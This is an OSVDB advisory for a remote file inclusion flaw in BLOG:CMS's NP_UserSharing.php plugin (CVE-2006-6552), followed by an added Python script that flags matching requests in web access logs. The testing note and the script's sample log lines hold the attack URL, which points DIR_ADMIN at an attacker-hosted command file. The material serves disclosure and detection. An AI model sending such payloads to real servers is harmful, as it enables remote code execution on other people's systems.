BLOG:CMS admin/plugins/NP_UserSharing.php DIR_ADMIN Variable Remote File Inclusion

2006-12-12T09:33:36
ID OSVDB:32258
Type osvdb
Reporter OSVDB
Modified 2006-12-12T09:33:36

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=http://[attacker]/tools/cmd.txt?admin
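A log check for the request pattern in the manual testing note, added here as an example (it is not part of the OSVDB entry). The combined log format, the sample lines, the `attacker.example` host and the function names are assumptions; the script path and the DIR_ADMIN variable come from the entry.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line of a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# A scheme prefix means the include path points at another host or wrapper.
REMOTE_RE = re.compile(r'^\s*[a-z][a-z0-9+.-]*://', re.IGNORECASE)
SCRIPT = "/admin/plugins/np_usersharing.php"

def classify(line):
    """Return 'remote-include', 'client-supplied' or None for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # Compare case-insensitively: some filesystems ignore case in paths.
    if not unquote(parts.path).lower().endswith(SCRIPT):
        return None
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # PHP turns dots and spaces in incoming names into underscores.
        if name.replace(".", "_").replace(" ", "_") == "DIR_ADMIN":
            return "remote-include" if REMOTE_RE.match(value) else "client-supplied"
    return None

def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict))
    return hits

# Constructed sample log; addresses are from documentation ranges.
# Limitation: with register_globals on, POST bodies and cookies also set
# globals, and those do not appear in an access log.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Dec/2006:09:40:01 +0000] "GET /Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=http://attacker.example/tools/cmd.txt?admin HTTP/1.1" 200 512',
    '192.0.2.11 - - [12/Dec/2006:09:41:17 +0000] "GET /blog_cms/admin/plugins/np_usersharing.php?x=1&DIR_ADMIN=hTTp%3A%2F%2Fattacker.example%2Fc.txt%3F HTTP/1.0" 200 498',
    '198.51.100.7 - - [12/Dec/2006:09:42:30 +0000] "GET /Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=../ HTTP/1.1" 200 120',
    '198.51.100.8 - - [12/Dec/2006:09:43:02 +0000] "GET /Blog_CMS/index.php?DIR_ADMIN=http://attacker.example/ HTTP/1.1" 200 2048',
    '198.51.100.9 - - [12/Dec/2006:09:44:55 +0000] "GET /Blog_CMS/admin/plugins/NP_UserSharing.php HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(n, verdict)
```

Any request that supplies DIR_ADMIN to this script is worth reviewing, since the variable is not meant to come from the client; the `remote-include` verdict marks the values that carry a URL scheme.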

References:

Security Tracker: 1017375
Secunia Advisory ID: 23345
Other Advisory URL: http://www.milw0rm.com/exploits/2923
Mail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=116595444801459&w=2
ISS X-Force ID: 30854
FrSIRT Advisory: ADV-2006-4984
CVE-2006-6552